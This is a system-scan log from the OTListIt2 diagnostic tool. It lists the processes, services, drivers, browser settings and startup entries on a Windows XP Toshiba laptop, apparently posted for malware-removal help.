F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded

Computer Name: JOHNLAPTOP
Current User Name: John B
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: Current user
Output = Minimal
File Age = 30 Days
Company Name Whitelist: On

========== Processes (SafeList) ==========

PRC - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe (ALWIL Software)
PRC - C:\Program Files\Alwil Software\Avast4\ashServ.exe (ALWIL Software)
PRC - C:\WINDOWS\Explorer.EXE (Microsoft Corporation)
PRC - C:\WINDOWS\system32\TPSMain.exe (TOSHIBA Corporation)
PRC - C:\WINDOWS\AGRSMMSG.exe (Agere Systems)
PRC - C:\WINDOWS\system32\TFNF5.exe (TOSHIBA Corp.)
PRC - C:\Program Files\Alwil Software\Avast4\ashDisp.exe (ALWIL Software)
PRC - C:\Program Files\Java\jre6\bin\jusched.exe (Sun Microsystems, Inc.)
PRC - C:\Documents and Settings\All Users\Start Menu\Programs\Startup\00THotkey.exe (TOSHIBA Corp.)
PRC - C:\WINDOWS\system32\TPSBattM.exe (TOSHIBA Corporation)
PRC - C:\WINDOWS\system32\RAMASST.exe (Matsushita Electric Industrial Co., Ltd.)
PRC - C:\Program Files\Common Files\ArcSoft\Connection Service\Bin\ACService.exe (ArcSoft Inc.)
PRC - C:\WINDOWS\system32\drivers\CDAC11BA.EXE (C-Dilla Ltd)
PRC - C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe (TOSHIBA CORPORATION)
PRC - C:\WINDOWS\System32\DVDRAMSV.exe (Matsushita Electric Industrial Co., Ltd.)
PRC - C:\Program Files\Java\jre6\bin\jqs.exe (Sun Microsystems, Inc.)
PRC - C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe (Microsoft Corporation)
PRC - C:\WINDOWS\system32\HPZipm12.exe (HP)
PRC - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe (Analog Devices, Inc.)
PRC - C:\Program Files\Canon\CAL\CALMAIN.exe (Canon Inc.)
PRC - C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\HP1006MC.EXE (Software 2000 Limited)
PRC - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe (ALWIL Software)
PRC - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe (ALWIL Software)
PRC - C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)
PRC - C:\WINDOWS\system32\dumprep.exe (Microsoft Corporation)
PRC - C:\Documents and Settings\John B\Desktop\OTListIt2.exe (OldTimer Tools)

========== Win32 Services (SafeList) ==========

SRV - (ACDaemon [Auto | Running]) -- C:\Program Files\Common Files\ArcSoft\Connection Service\Bin\ACService.exe (ArcSoft Inc.)
SRV - (aspnet_state [On_Demand | Stopped]) -- C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe (Microsoft Corporation)
SRV - (aswUpdSv [Auto | Running]) -- C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe (ALWIL Software)
SRV - (avast! Antivirus [Auto | Running]) -- C:\Program Files\Alwil Software\Avast4\ashServ.exe (ALWIL Software)
SRV - (avast! Mail Scanner [On_Demand | Running]) -- C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe (ALWIL Software)
SRV - (avast! Web Scanner [On_Demand | Running]) -- C:\Program Files\Alwil Software\Avast4\ashWebSv.exe (ALWIL Software)
SRV - (C-DillaCdaC11BA [Auto | Running]) -- C:\WINDOWS\system32\drivers\CDAC11BA.EXE (C-Dilla Ltd)
SRV - (CCALib8 [Auto | Running]) -- C:\Program Files\Canon\CAL\CALMAIN.exe (Canon Inc.)
SRV - (CFSvcs [Auto | Running]) -- C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe (TOSHIBA CORPORATION)
SRV - (clr_optimization_v2.0.50727_32 [On_Demand | Stopped]) -- C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe (Microsoft Corporation)
SRV - (DVD-RAM_Service [Auto | Running]) -- C:\WINDOWS\System32\DVDRAMSV.exe (Matsushita Electric Industrial Co., Ltd.)
SRV - (gupdate1c9a0d0dfd66502 [Auto | Stopped]) -- C:\Program Files\Google\Update\GoogleUpdate.exe (Google Inc.)
SRV - (helpsvc [Auto | Running]) -- C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll (Microsoft Corporation)
SRV - (IDriverT [On_Demand | Stopped]) -- C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe (Macrovision Corporation)
SRV - (JavaQuickStarterService [Auto | Running]) -- C:\Program Files\Java\jre6\bin\jqs.exe (Sun Microsystems, Inc.)
SRV - (MDM [Auto | Running]) -- C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe (Microsoft Corporation)
SRV - (MSCSPTISRV [On_Demand | Stopped]) -- C:\Program Files\Common Files\Sony Shared\AVLib\MSCSPTISRV.exe (Sony Corporation)
SRV - (ose [On_Demand | Stopped]) -- C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE (Microsoft Corporation)
SRV - (PACSPTISVR [On_Demand | Stopped]) -- C:\Program Files\Common Files\Sony Shared\AVLib\PACSPTISVR.exe ()
SRV - (Pml Driver HPH11 [On_Demand | Stopped]) -- C:\WINDOWS\system32\HPHipm11.exe (HP)
SRV - (Pml Driver HPZ12 [Unknown | Running]) -- C:\WINDOWS\system32\HPZipm12.exe (HP)
SRV - (rpcapd [On_Demand | Stopped]) -- C:\Program Files\WinPcap\rpcapd.exe (CACE Technologies)
SRV - (SonicStage Back-End Service [On_Demand | Stopped]) -- C:\Program Files\Common Files\Sony Shared\AVLib\SsBeSvc.exe (Sony Corporation)
SRV - (SoundMAX Agent Service (default) [Auto | Running]) -- C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe (Analog Devices, Inc.)
SRV - (SPTISRV [On_Demand | Stopped]) -- C:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe (Sony Corporation)
SRV - (SSScsiSV [On_Demand | Stopped]) -- C:\Program Files\Common Files\Sony Shared\AVLib\SSScsiSV.exe (Sony Corporation)
SRV - (usnjsvc [On_Demand | Stopped]) -- C:\Program Files\MSN Messenger\usnsvc.exe (Microsoft Corporation)
SRV - (WMPNetworkSvc [On_Demand | Stopped]) -- C:\Program Files\Windows Media Player\WMPNetwk.exe (Microsoft Corporation)

========== Driver Services (SafeList) ==========

DRV - (Aavmker4 [System | Running]) -- C:\WINDOWS\System32\drivers\aavmker4.sys (ALWIL Software)
DRV - (aeaudio [On_Demand | Running]) -- C:\WINDOWS\system32\drivers\aeaudio.sys (Andrea Electronics Corporation)
DRV - (AegisP [Auto | Running]) -- C:\WINDOWS\system32\DRIVERS\AegisP.sys (Cisco Systems, Inc.)
DRV - (Afc [On_Demand | Running]) -- C:\WINDOWS\system32\drivers\Afc.sys (Arcsoft, Inc.)
DRV - (AFS2K [System | Running]) -- C:\WINDOWS\System32\drivers\AFS2K.SYS (Oak Technology Inc.)
DRV - (AgereSoftModem [On_Demand | Running]) -- C:\WINDOWS\System32\DRIVERS\AGRSM.sys (Agere Systems)
DRV - (ApfiltrService [On_Demand | Running]) -- C:\WINDOWS\System32\DRIVERS\Apfiltr.sys (Alps Electric Co., Ltd.)
DRV - (APL531 [On_Demand | Stopped]) -- C:\WINDOWS\System32\Drivers\ov550i.sys (Omnivision Technologies, Inc.)
DRV - (aswFsBlk [Auto | Running]) -- C:\WINDOWS\system32\DRIVERS\aswFsBlk.sys (ALWIL Software)
DRV - (aswMon2 [Auto | Running]) -- C:\WINDOWS\System32\drivers\aswmon2.sys (ALWIL Software)
DRV - (aswRdr [On_Demand | Running]) -- C:\WINDOWS\System32\drivers\aswRdr.sys (ALWIL Software)
DRV - (aswSP [System | Running]) -- C:\WINDOWS\System32\drivers\aswSP.sys (ALWIL Software)
DRV - (aswTdi [System | Running]) -- C:\WINDOWS\System32\drivers\aswTdi.sys (ALWIL Software)
DRV - (atksgt [Auto | Running]) -- C:\WINDOWS\system32\DRIVERS\atksgt.sys ()
DRV - (BsStor [Boot | Running]) -- C:\WINDOWS\System32\drivers\BsStor.sys (B.H.A Co.,Ltd.)
DRV - (BsUDF [Disabled | Running]) -- C:\WINDOWS\System32\drivers\BsUDF.sys (B.H.A Co.,Ltd.)
DRV - (CdaC15BA [Auto | Running]) -- C:\WINDOWS\system32\drivers\CDAC15BA.SYS ()
DRV - (Dot4 HPH11 [On_Demand | Stopped]) -- C:\WINDOWS\system32\DRIVERS\hphid411.sys (HP)
DRV - (Dot4Print HPH11 [On_Demand | Stopped]) -- C:\WINDOWS\system32\DRIVERS\hphipr11.sys (HP)
DRV - (Dot4Usb HPH11 [On_Demand | Stopped]) -- C:\WINDOWS\System32\drivers\hphius11.sys (HP)
DRV - (E100B [On_Demand | Running]) -- C:\WINDOWS\System32\DRIVERS\e100b325.sys (Intel Corporation)
DRV - (EAPPkt [Auto | Running]) -- C:\WINDOWS\system32\DRIVERS\EAPPkt.sys (Realtek)
DRV - (FTDIBUS [On_Demand | Stopped]) -- C:\WINDOWS\system32\drivers\ftdibus.sys (FTDI Ltd.)
DRV - (giveio [Disabled | Stopped]) -- C:\WINDOWS\system32\giveio.sys ()
DRV - (grmnusb [On_Demand | Stopped]) -- C:\WINDOWS\system32\drivers\grmnusb.sys (GARMIN Corp.)
DRV - (GWIOPM [On_Demand | Stopped]) -- c:\Program Files\LEA Digital Recorder\gwiopm.sys ()
DRV - (HPZid412 [On_Demand | Stopped]) -- C:\WINDOWS\system32\DRIVERS\HPZid412.sys (HP)
DRV - (HPZipr12 [On_Demand | Stopped]) -- C:\WINDOWS\system32\DRIVERS\HPZipr12.sys (HP)
DRV - (HPZius12 [On_Demand | Stopped]) -- C:\WINDOWS\system32\DRIVERS\HPZius12.sys (HP)
DRV - (ialm [On_Demand | Running]) -- C:\WINDOWS\System32\DRIVERS\ialmnt5.sys (Intel Corporation)
DRV - (lirsgt [Auto | Running]) -- C:\WINDOWS\system32\DRIVERS\lirsgt.sys ()
DRV - (MASPINT [Auto | Running]) -- C:\WINDOWS\System32\drivers\MASPINT.SYS (MicroStaff Co.,Ltd.)
DRV - (MDC8021X [Auto | Running]) -- C:\WINDOWS\system32\DRIVERS\mdc8021x.sys (Meetinghouse Data Communications)
DRV - (meiudf [System | Running]) -- C:\WINDOWS\System32\Drivers\meiudf.sys (Matsushita Electric Industrial Co.,Ltd.)
DRV - (Netdevio [Auto | Running]) -- C:\WINDOWS\System32\DRIVERS\netdevio.sys (TOSHIBA Corporation.)
DRV - (NETGEAR_MA111 [On_Demand | Stopped]) -- C:\WINDOWS\System32\DRIVERS\MA111nd5.sys ( )
DRV - (NPF [On_Demand | Stopped]) -- C:\WINDOWS\system32\drivers\npf.sys (CACE Technologies)
DRV - (pciSd [On_Demand | Stopped]) -- C:\WINDOWS\System32\DRIVERS\tossdpci.sys (TOSHIBA)
DRV - (pfc [On_Demand | Running]) -- C:\WINDOWS\system32\drivers\pfc.sys (Padus, Inc.)
DRV - (PRISM_A02 [On_Demand | Stopped]) -- C:\WINDOWS\System32\DRIVERS\PRISMAXP.sys (GlobespanVirata, Inc.)
DRV - (Ptilink [On_Demand | Running]) -- C:\WINDOWS\System32\DRIVERS\ptilink.sys (Parallel Technologies, Inc.)
DRV - (PxHelp20 [Boot | Running]) -- C:\WINDOWS\System32\DRIVERS\PxHelp20.sys (Sonic Solutions)
DRV - (rt2870 [On_Demand | Stopped]) -- C:\WINDOWS\system32\DRIVERS\rt2870.sys (Ralink Technology, Corp.)
DRV - (Secdrv [On_Demand | Stopped]) -- C:\WINDOWS\System32\DRIVERS\secdrv.sys (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.)
DRV - (sfdrv01 [Boot | Running]) -- C:\WINDOWS\System32\drivers\sfdrv01.sys (Protection Technology)
DRV - (sfhlp02 [Boot | Running]) -- C:\WINDOWS\System32\drivers\sfhlp02.sys (Protection Technology)
DRV - (smwdm [On_Demand | Running]) -- C:\WINDOWS\system32\drivers\smwdm.sys (Analog Devices, Inc.)
DRV - (sonypvs1 [On_Demand | Stopped]) -- C:\WINDOWS\system32\DRIVERS\sonypvs1.sys (Sony Corporation)
DRV - (speedfan [Boot | Running]) -- C:\WINDOWS\system32\speedfan.sys (Windows ® 2000 DDK provider)
DRV - (SUSTUCAM [On_Demand | Stopped]) -- C:\WINDOWS\system32\DRIVERS\sustucam.sys (Susteen, Inc.)
DRV - (TBiosDrv [Auto | Running]) -- C:\WINDOWS\System32\drivers\TBiosDrv.sys ()
DRV - (tmcomm [Auto | Running]) -- C:\WINDOWS\system32\drivers\tmcomm.sys (Trend Micro Inc.)
DRV - (tossmbnt [Auto | Running]) -- C:\WINDOWS\System32\drivers\TOSSMBNT.sys ()
DRV - (tsdhd [On_Demand | Stopped]) -- C:\WINDOWS\System32\DRIVERS\tsdhd.sys (TOSHIBA Corporation)
DRV - (TVALZ [Boot | Running]) -- C:\WINDOWS\System32\DRIVERS\TVALZ.SYS (TOSHIBA Corporation)
DRV - (usbaudio [On_Demand | Stopped]) -- C:\WINDOWS\system32\drivers\usbaudio.sys (Microsoft Corporation)
DRV - (WlanUIB [On_Demand | Stopped]) -- C:\WINDOWS\System32\DRIVERS\MA111nd5.sys ( )
DRV - ({6080A529-897E-4629-A488-ABA0C29B635E} [On_Demand | Stopped]) -- C:\WINDOWS\system32\drivers\ialmsbw.sys (Intel Corporation)
DRV - ({D31A0762-0CEB-444e-ACFF-B049A1F6FE91} [On_Demand | Stopped]) -- C:\WINDOWS\system32\drivers\ialmkchw.sys (Intel Corporation)
DRV - ({E2B953A6-195A-44F9-9BA3-3D5F4E32BB55} [On_Demand | Stopped]) -- C:\WINDOWS\system32\drivers\wA301a.sys (Intel Corporation)

========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft....k/?LinkId=69157
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft....k/?LinkId=54896
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\windows\system32\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft....k/?LinkId=54896
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch = http://ie.search.msn...st/srchcust.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.microsoft...amp;ar=iesearch
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://ie.search.msn...st/srchasst.htm

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.microsoft...amp;ar=iesearch
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\windows\system32\blank.htm
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft...amp;ar=iesearch
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft...p...&ar=msnhome
IE - URLSearchHook: {EF99BD32-C1FB-11D2-892F-0090271D4F88} - Reg Error: Key error. File not found
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = <local>

========== FireFox ==========

FF - prefs.js..browser.startup.homepage: "www.yahoo.com"
FF - prefs.js..extensions.enabledItems: {DCBD1271-D228-4082-9FBC-36D9B7660B03}:1.1.8
FF - prefs.js..extensions.enabledItems: [email protected]:0.8.1
FF - prefs.js..extensions.enabledItems: {DDC359D1-844A-42a7-9AA1-88A850A938A8}:1.1.3
FF - prefs.js..extensions.enabledItems: {fffe0eac-3819-4561-8aa9-178a68450d4f}:1.9
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA}:6.0.14
FF - prefs.js..extensions.enabledItems: [email protected]:1.0
FF - prefs.js..extensions.enabledItems: [email protected]:1.1.1
FF - prefs.js..extensions.enabledItems: {5872365e-67d1-4afd-9480-fd293bebd20d}:1.7.2
FF - prefs.js..extensions.enabledItems: {e968fc70-8f95-4ab9-9e79-304de2a71ee1}:0.7
FF - prefs.js..extensions.enabledItems: {972ce4c6-7e08-4474-a285-3208198ce6fd}:3.0.11
FF - prefs.js..extensions.foxtor.browser.search.update: true

FF - HKLM\software\mozilla\Firefox\Extensions\\[email protected]: C:\PROGRAM FILES\JAVA\JRE6\LIB\DEPLOY\JQS\FF [2009/06/24 15:58:58 | 00,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Firefox 3.0.11\extensions\\Components: C:\PROGRAM FILES\MOZILLA FIREFOX\COMPONENTS [2009/06/16 09:03:43 | 00,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Firefox 3.0.11\extensions\\Plugins: C:\PROGRAM FILES\MOZILLA FIREFOX\PLUGINS [2009/06/24 15:59:23 | 00,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Thunderbird 2.0.0.21\extensions\\Components: C:\PROGRAM FILES\MOZILLA THUNDERBIRD\COMPONENTS [2009/04/01 14:12:30 | 00,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Thunderbird 2.0.0.21\extensions\\Plugins: C:\PROGRAM FILES\MOZILLA THUNDERBIRD\PLUGINS [2009/03/03 11:10:06 | 00,000,000 | ---D | M]

[2009/01/10 15:56:45 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Extensions
[2009/01/10 15:56:45 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}
[2009/07/08 15:00:18 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Firefox\Profiles\ghtrl0km.default\extensions
[2008/02/10 10:04:28 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{5872365e-67d1-4afd-9480-fd293bebd20d}
[2008/12/03 00:29:03 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{DCBD1271-D228-4082-9FBC-36D9B7660B03}
[2009/05/12 14:13:43 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}
[2009/06/29 15:57:55 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{e968fc70-8f95-4ab9-9e79-304de2a71ee1}
[2009/03/20 13:42:00 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{fffe0eac-3819-4561-8aa9-178a68450d4f}
[2009/06/29 15:57:55 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Firefox\Profiles\ghtrl0km.default\extensions\[email protected]
[2008/09/10 22:44:32 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Firefox\Profiles\ghtrl0km.default\extensions\[email protected]
[2009/07/08 14:47:07 | 00,000,000 | ---D | M] -- C:\Program Files\mozilla firefox\extensions
[2009/06/16 09:03:43 | 00,000,000 | ---D | M] -- C:\Program Files\mozilla firefox\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2009/06/24 15:59:28 | 00,000,000 | ---D | M] -- C:\Program Files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA}
[2007/06/10 23:13:05 | 00,000,000 | ---D | M] -- C:\Program Files\mozilla firefox\extensions\talkback@mozilla(2).org
[2009/06/16 09:03:33 | 00,023,032 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browserdirprovider.dll
[2009/06/16 09:03:34 | 00,134,648 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\brwsrcmp.dll
[2009/01/10 15:56:18 | 00,001,394 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\amazondotcom.xml
[2009/01/10 15:56:18 | 00,002,193 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\answers.xml
[2009/01/10 15:56:18 | 00,001,534 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\creativecommons.xml
[2009/01/10 15:56:18 | 00,002,343 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\eBay.xml
[2009/01/10 15:56:18 | 00,001,706 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\google.xml
[2009/01/10 15:56:18 | 00,001,178 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia.xml

O1 HOSTS File: (0 bytes) - C:\WINDOWS\System32\drivers\etc\Hosts
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
O2 - BHO: (JQSIEStartDetectorImpl Class) - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll (Sun Microsystems, Inc.)
O4 - HKLM..\Run: [AGRSMMSG] AGRSMMSG.exe (Agere Systems)
O4 - HKLM..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe (ALWIL Software)
O4 - HKLM..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe" (Sun Microsystems, Inc.)
O4 - HKLM..\Run: [TFNF5] TFNF5.exe (TOSHIBA Corp.)
O4 - HKLM..\Run: [TPSMain] TPSMain.exe (TOSHIBA Corporation)
O4 - HKCU..\Run: [Trackstick Manager.exe] "C:\Program Files\Trackstick Manager\Trackstick Manager.EXE" -min (Telespial Systems)
O4 - HKCU..\Run: [updateMgr] "C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" AcRdB7_0_9 -reboot 1 (Adobe Systems Incorporated)
O4 - HKLM..\RunOnce: [InnoSetupRegFile.0000000001] "C:\WINDOWS\is-26UPH.exe" /REG ()
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\00THotkey.exe (TOSHIBA Corp.)
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Belkin N Wireless USB Adapter Client Utility.lnk = C:\Program Files\Belkin\F5D8053\v5\Belkinwcui.exe (Belkin)
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\RAMASST.lnk = C:\WINDOWS\system32\RAMASST.exe (Matsushita Electric Industrial Co., Ltd.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoCDBurning = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: dontdisplaylastusername = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: legalnoticecaption =
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: legalnoticetext =
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: shutdownwithoutlogon = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: undockwithoutlogon = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DisableRegistryTools = 0
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableProfileQuota = 1
O9 - Extra Button: PokerStars - {3AD14F0C-ED16-4e43-B6D8-661B03F6A1EF} - C:\Program Files\PokerStars\PokerStarsUpdate.exe (PokerStars)
O9 - Extra 'Tools' menuitem : Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe ()
O9 - Extra 'Tools' menuitem : @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe (Microsoft Corporation)
O9 - Extra Button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe (Microsoft Corporation)
O15 - HKLM\..Trusted Domains: 1 domain(s) and sub-domain(s) not assigned to a zone.
O15 - HKCU\..Trusted Domains: ([]msn in My Computer)
O15 - HKCU\..Trusted Domains: aol.com ([free] http in Trusted sites)
O15 - HKCU\..Trusted Domains: 28 domain(s) and sub-domain(s) not assigned to a zone.
O16 - DPF: {05CA9FB0-3E3E-4B36-BF41-0E3A5CAA8CD8} http://go.microsoft....k/?linkid=58813 (Office Genuine Advantage Validation Tool)
O16 - DPF: {11260943-421B-11D0-8EAC-0000C07D88CF} http://www.ipix.com/viewers/ipixx.cab (iPIX ActiveX Control)
O16 - DPF: {149E45D8-163E-4189-86FC-45022AB2B6C9} (SpinTop DRM Control)
O16 - DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} http://housecall65.t...ivex/hcImpl.cab (Trend Micro ActiveX Scan Agent 6.6)
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} C:\Program Files\Yahoo!\Common\yinsthelper.dll (YInstStarter Class)
O16 - DPF: {341FF14B-00CB-49F5-A427-A164DF1D5E1F} http://musicstore.co...ALStreaming.cab (MALPlaybackCtrl Class)
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (Reg Error: Key error.)
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} http://download.bitd...can8/oscan8.cab (BDSCANONLINE Control)
O16 - DPF: {7D731A83-6C80-4EA4-9646-5E06A0513274} http://www.shockwave...gwebinstall.cab (Sandlot Loader Control)
O16 - DPF: {7E980B9B-8AE5-466A-B6D6-DA8CF814E78A} http://www.shockwave...mjolauncher.cab (MJLauncherCtrl Class)
O16 - DPF: {87056D28-9730-4A47-B9F9-7E890B62C58A} http://www.shockwave...bugs/axhost.cab (WildfireActiveXHost Class)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_14)
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} http://acs.pandasoft...free/asinst.cab (ActiveScan Installer Class)
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} http://v4.windowsupd...8135.7490393519 (Reg Error: Key error.)
O16 - DPF: {B1826A9F-4AA0-4510-BA77-9013E74E4B9B} http://www.trendmicr...scan/as4web.cab (Reg Error: Key error.)
O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} http://download.mcaf...,20/mcgdmgr.cab (Reg Error: Key error.)
O16 - DPF: {C7DB51B4-BCF7-4923-8874-7F1A0DC92277} http://office.micros...ntent/opuc4.cab (Office Update Installation Engine)
O16 - DPF: {CAFEEFAC-0014-0002-0016-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.4.2_16)
O16 - DPF: {CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_14)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_14)
O16 - DPF: {CC450D71-CC90-424C-8638-1F2DBAC87A54} (ArmHelper Control)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload.ma...ash/swflash.cab (Shockwave Flash Object)
O16 - DPF: {D77EF652-9A6B-40C8-A4B9-1C0697C6CF41} http://download.game...inematycoon.cab (TikGames Online Control)
O18 - Protocol\Handler\cdo {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL (Microsoft Corporation)
O18 - Protocol\Handler\http\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\SYSTEM\Ole DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\http\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\SYSTEM\Ole DB\msdaipp.dll (Microsoft Corporation)
